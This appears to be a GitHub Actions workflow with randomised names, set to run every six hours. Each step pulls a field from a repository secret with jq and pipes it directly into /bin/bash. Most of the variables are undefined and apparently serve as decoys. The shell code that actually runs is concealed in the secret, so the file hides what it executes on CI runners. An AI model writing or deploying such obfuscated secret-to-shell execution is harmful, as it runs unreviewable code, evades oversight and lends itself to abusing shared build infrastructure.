name: chenqinzii

on:
  workflow_dispatch:
  schedule:
    - cron: '43 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenqinzii
        env:
          dsbm862: ${{ secrets.dsbm862 }}
        run: |
          echo $dsbm862 | jq -r .t9 | /bin/bash
          echo $qlvcx4 | jq -r .ei8 | /bin/bash
          echo $o81 | jq -r .fazex436 | /bin/bash
          echo $wsfvm7887 | jq -r .vzwcd4025 | /bin/bash
          echo $za64 | jq -r .x8105 | /bin/bash
          echo $cu30 | jq -r .ze862 | /bin/bash
          echo $gmoiu375 | jq -r .k31 | /bin/bash
          echo $taxp71 | jq -r .wex3 | /bin/bash
          echo $xfgsu27346 | jq -r .wkfyk8 | /bin/bash
          echo $qtb4 | jq -r .zws7893 | /bin/bash
          echo $eaij1 | jq -r .oix4 | /bin/bash
          echo $orlhs82 | jq -r .wez1 | /bin/bash
          echo $i6 | jq -r .la7 | /bin/bash

